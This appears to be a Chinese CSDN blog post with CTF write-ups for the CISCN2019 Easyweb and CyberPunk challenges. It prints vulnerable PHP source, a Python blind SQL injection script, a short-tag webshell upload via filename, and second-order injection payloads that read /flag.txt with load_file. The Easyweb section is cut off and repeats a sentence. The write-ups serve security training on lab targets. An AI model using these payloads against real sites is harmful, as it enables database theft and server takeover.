[CISCN2019 总决赛 Day2 Web1]Easyweb

最新推荐文章于 2024-05-21 13:22:25 发布
最新推荐文章于 2024-05-21 13:22:25 发布
阅读量4.6k 收藏
点赞数 1
文章标签: web 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51684648/article/details/123685385
版权

[CISCN2019 总决赛 Day2 Web1]Easyweb

1、打开页面,试了试,xml,sql注入都没试出来。

查看robots.txt文件,发现image-20220321201709362

再查看源码,发现了image.php,试一下

image.php.bak泄露

<?php
include "config.php";

$id=isset($_GET["id"])?$_GET["id"]:"1";
$path=isset($_GET["path"])?$_GET["path"]:"";

$id=addslashes($id);
$path=addslashes($path);

$id=str_replace(array("\\0","%00","\\'","'"),"",$id);
$path=str_replace(array("\\0","%00","\\'","'"),"",$path);

$result=mysqli_query($con,"select * from images where id='{$id}' or path='{$path}'");
$row=mysqli_fetch_array($result,MYSQLI_ASSOC);

$path="./" . $row["path"];
header("Content-Type: image/jpeg");
readfile($path);

根据源码我们可以发现,两个get参数,经过了过滤。问题不大。

试一下报错:

image-20220321202157244

不行,那就盲注。

import requests
url='http://bc0fc102-e0c0-4930-a65f-177e029db728.node4.buuoj.cn:81/image.php'
flag=""

payload1 = "?id=\\0& path=or(ord(substr((select(database())),{},1))>{})%23"
payload2 = "?id=\\0& path=or(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),{},1))>{})%23"
payload3 = "?id=\\0& path=or(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name=0x7573657273)),{},1))>{})%23"
payload4 = "?id=\\0& path=or(ord(substr((select(group_concat(username,password))from(users)),{},1))>{})%23"
for i in range(1,1000):
    low =  32
    high = 128
    mid = (low + high)//2
    while(low<high):
        payload = payload4.format(i,mid)
        new_url= url+payload
        r= requests.get(new_url)
        if "JFIF" in r.text:
            low=mid+1
        else:
            high=mid

        mid = (low+high)//2
    if (mid == 32 or mid == 128):
        break
    flag +=chr(mid)
    print(flag)

print(flag)

得到账号密码

image-20220321202244845

然后发现了文件上传的地方

image-20220321202659432

尝试上传文件,果然不允许上传php文件,先传图片试试

image-20220321203509669

提示,讲文件名传入了log文件,那如果我们把文件名换成一句话木马是不是就可以了

image-20220321203620071

还是提示不让传php文件,但咱们传的是个代码。可能后端是通过判断是否存在php字符串的吧,那就换成短标签的形式上传。上传成功:

image-20220321203807551

是个代码。可能后端是通过判断是否存在php字符串的吧,那就换成短标签的形式上传。上传成功:

[CISCN2019 华北赛区 Day1 Web5]CyberPunk

先查看源码:

image-20220316161758880

猜测可能用伪协议读取源码

image-20220316161907579

依次读取源码

index.php

ini_set('open_basedir', '/var/www/html/');

// $file = $_GET["file"];
$file = (isset($_GET['file']) ? $_GET['file'] : null);
if (isset($file)){
    if (preg_match("/phar|zip|bzip2|zlib|data|input|%00/i",$file)) {
        echo('no way!');
        exit;
    }
    @include($file);
}
?>

search.php

<?php

require_once "config.php"; 

if(!empty($_POST["user_name"]) && !empty($_POST["phone"]))
{
    $msg = '';
    $pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';
    $user_name = $_POST["user_name"];
    $phone = $_POST["phone"];
    if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){ 
        $msg = 'no sql inject!';
    }else{
        $sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";
        $fetch = $db->query($sql);
    }

    if (isset($fetch) && $fetch->num_rows>0){
        $row = $fetch->fetch_assoc();
        if(!$row) {
            echo 'error';
            print_r($db->error);
            exit;
        }
        $msg = "<p>姓名:".$row['user_name']."</p><p>, 电话:".$row['phone']."</p><p>, 地址:".$row['address']."</p>";
    } else {
        $msg = "未找到订单!";
    }
}else {
    $msg = "信息不全";
}
?>

confirm.php

阅读confirm.php源码发现了过滤的地方,对user_name和phone都进行了严格的过滤。而address却只是转义了一下。如果user_name和phone参数没问题的话,address参数会被存到数据库中。

<?php

require_once "config.php";
//var_dump($_POST);

if(!empty($_POST["user_name"]) && !empty($_POST["address"]) && !empty($_POST["phone"]))
{
    $msg = '';
    $pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';
    $user_name = $_POST["user_name"];
    $address = $_POST["address"];
    $phone = $_POST["phone"];
    if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){
        $msg = 'no sql inject!';
    }else{
        $sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";
        $fetch = $db->query($sql);
    }

    if($fetch->num_rows>0) {
        $msg = $user_name."已提交订单";
    }else{
        $sql = "insert into `user` ( `user_name`, `address`, `phone`) values( ?, ?, ?)";
        $re = $db->prepare($sql);
        $re->bind_param("sss", $user_name, $address, $phone);
        $re = $re->execute();
        if(!$re) {
            echo 'error';
            print_r($db->error);
            exit;
        }
        $msg = "订单提交成功";
    }
} else {
    $msg = "信息不全";
}
?>

change.php

再看一下这边,过滤的参数和内容相同,但是会调用数据库中的旧参数。这下妥了,二次注入

<?php

require_once "config.php";

if(!empty($_POST["user_name"]) && !empty($_POST["address"]) && !empty($_POST["phone"]))
{
    $msg = '';
    $pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';
    $user_name = $_POST["user_name"];
    $address = addslashes($_POST["address"]);
    $phone = $_POST["phone"];
    if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){
        $msg = 'no sql inject!';
    }else{
        $sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";
        $fetch = $db->query($sql);
    }

    if (isset($fetch) && $fetch->num_rows>0){
        $row = $fetch->fetch_assoc();
        $sql = "update `user` set `address`='".$address."', `old_address`='".$row['address']."' where `user_id`=".$row['user_id'];
        $result = $db->query($sql);
        if(!$result) {
            echo 'error';
            print_r($db->error);
            exit;
        }
        $msg = "订单修改成功";
    } else {
        $msg = "未找到订单!";
    }
}else {
    $msg = "信息不全";
}
?>

首先构造好payload作为注册时的地址,当修改地址时,会触发sql注入,这里使用的是updatexml(),每次只能回显32为,所以分两次读取。

1' where user_id=updatexml(1,concat(0x7e,(select substr(load_file('/flag.txt'),1,30)),0x7e),1)#

1' where user_id=updatexml(1,concat(0x7e,(select substr(load_file('/flag.txt'),30,50)),0x7e),1)#

image-20220316164049403

然后连蚁剑就行。

YI_an#
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUUCTF-WEB-[CISCN2019 华北赛区 Day1 Web2]ikun
weixin_43345082的博客
07-30 8493
当时没做出来,大佬复现了环境就做一波 题目 第一步提示我们要找到lv6 写个脚本找一下 import requests url="http://web44.buuoj.cn/shop?page=" for i in range(0,2000): r=requests.get(url+str(i)) if 'lv6.png' in r.text: print (i) break ...
Double ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
pwn赛题之Double ciscn 2019 第十二届全国大学生信息安全竞赛
BUU CTF[CISCN2019 总决赛 Day2 Web1]Easyweb 1
weixin_46245411的博客
06-16 750
文章目录前言一、源码审计二、开始冻手1.伪造Cookie2.上传文件3.getshell总结 前言 没赶上2019CISCN比赛,只能在BUU看到前人大佬们的荣光~ 不是很清楚BUU附属的源码是不是与比赛题目所给的一样,如果一样的话,我看其他大佬的WP都有BOOL盲注的出现,但是我直接审计源码绕过了SQL注入了,所以很好奇是不是有什么差异~ 所以我仅说说我解BUU的过程 一、源码审计 个人审计用到的几个比较重要源码:upload.php、config.php、function.php、user.p..
CISCN2019 总决赛 Day2 Web1】-Easy web
xixihahawuwu的博客
11-28 769
进入环境是一个登录界面检查页面元素没有发现啥,我们把源码下载下来看看先看config文件 是一个数据库文件 数据库名为ciscnfinal 接着看function文件 我们可以看到有关登录界面的还有两个函数方法 看image文件Get传递两个参数 把一些字符替换成空Addslashes()函数会把一些特殊的字符转义,比如单引号转为\’,\转为\其他的看了下,没有什么信息就过掉了 我们看下upload文件要求我们用户名必须为admin 这里我们可以获得用户名admin在user文件中我们可以知道成功登陆后的.
CISCN2024-Web方向题解
最新发布
Err0r233的博客
05-21 1684
CISCN打烂了,几个题都是差一点就出,自己还是太菜了。
【CTF】2023Ciscn WEB方向题解
Sapphire037的博客
05-29 2374
比赛体验一般,一黑灯基本上题都烂掉。
ciscn 2018 部分writeup
StriveBen的博客
05-07 3912
ciscn 2018 部分writeup flag in your hand 这是一道js解密的题目: 发现checkToken函数数里返回的s===”FAKE-TOKEN”,使用这个字符串却得到wrong,而且ic后面被更改了: 跟踪bm函数: 这里charCodeAt() 方法可返回指定位置的字符的 Unicode 编码; 在ck函数里,ic的值又被更改了,所以要想...
ciscn_2019_c_3
seaaseesa的博客
05-01 826
ciscn_2019_c_3 首先,检查一下程序的保护机制 Glibc给定版本2.27 然后,我们用IDA分析一下 Delete功能没有清空指针 只能向heap_data + 0x10处开始输入数据,这意味着,chunk的fd域不能被我们修改到 Backdoor函数可以对chunk的fd域做修改,因此,我们可以利用backdoor,将fd指向伪造的chunk处,而伪造的ch...
baby_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
baby_pwn 赛题 ciscn 2019 第十二届全国大学生信息安全竞赛
[CISCN2019 华东南赛区]Web11
qq_43801002的博客
05-05 195
#题目: 1.观察一波,最下面Build With Smarty !,网站用的是php模板引擎SSTI。左上角IP,并且右上角记录当前IP,有了,很可能是在XFF处存在注入 2.Smarty支持使用{php}{/php}标签来执行被包裹其中的php命令,但是执行{php phpinfo()}{/php}时报错,经查阅资料,选择使用{if}条件判断。 Smarty的{if}条件判断和PHP的if ...
buuctf-[CISCN2019 总决赛 Day2 Web1]Easyweb
m0_62094846的博客
05-18 702
扫描目录 得到*.php.bak 尝试*表示的东西, index,flag之类的都没用 有image.php,顺便可以看到可能的注入点 下载下了备份文件 <?php include "config.php"; $id=isset($_GET["id"])?$_GET["id"]:"1"; $path=isset($_GET["path"])?$_GET["path"]:""; $id=addslashes($id); $path=addslashes($path); ...
[CISCN2019 华北赛区 Day1 Web1]Dropbox
沐目的博客
10-31 6797
知识点轰炸 1.1 open_basedir 在in_set这个函数中,可以设置php的一些配置,其中就包括open_basedir ,用来限制当前程序可以访问的目录。后来问了一下朱师傅,了解到:它是可以访问设置目录下的所有下级目录。 若"open_basedir = /dir/user", 那么目录 “/dir/user” 和 “/dir/other"都是可以访问的。所以如果要将访问限制在仅为指...
ciscn_2019_s_1
z1r0的博客
03-17 727
ciscn_2019_s_1 查看保护 申请的大小在0x7f-0x100之间 key1有限制,还有一个off-by-null key2不为0可以调用show这个函数 攻击思路:edit中有一个off-by-null,key1和key2都被限制了。其实攻击思路还挺明确的,因为heap是一个list,保护没有开pie,所以可以使用unlink来申请地址 1.首先肯定是要填充满tcache的,因为不是tcache的话,unlink不是双链表 2.接着考虑将unlink申请到哪里 在bss段这里可以看到有
[CISCN2019 华北赛区 Day2 Web1]Hack World
wuuconix's blog
04-02 4253
[CISCN2019 华北赛区 Day2 Web1]Hack World 这道题的考点貌似是sql盲注还是第一次遇到这种类型,表示太难了。。 主界面 它的意思是让我们给出文章的id,那我们就输入一试试。 有回显,出题人想要一个girlfriend。对此,我只想说,想peach。然后我们再输入2试试。 对这个回显,我怀疑出题人妄想症犯了。之后我们再输入3试试。 发生了错误,我们再输入万能密码试试。 好吧,它检测到sql注入了,以我目前的知识,我已经手足无措了,在网上查阅资
[SUCTF 2019]EasyWeb
沐目的博客
11-03 5438
https://blog.csdn.net/qq_42181428/article/details/99741920 https://www.cnblogs.com/cimuhuashuimu/p/11546422.html
2019CISCN华中赛区分区赛部分wp
一筐萝卜的博客
06-03 1412
pwn1 64位程序,只开启了NX(栈不可执行)保护,试着运行发现是一个菜单题,选项二、三没用 拖到IDA中查看,发现在encrypt选项中存在gets造成的栈溢出漏洞 不过输进去的字符串被分段异或了,我们可以先进性异或一下,然后在输入程序中,程序再异或一下就是我们想要的payload了 当时写脚本的时候发现流程劫持后,第二次发送payload的时候,payload没有被程序异或,直接打就可以...
[ciscn2019 总决赛 day2 web1]easyweb
03-16
ciscn2019 总决赛 day2 web1 easyweb 是一道Web安全题目,需要使用SQL注入技术来解决。 首先,我们需要在登录页面中输入用户名和密码。然后,我们可以通过在用户名和密码字段中输入一些SQL注入语句来尝试绕过验证...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值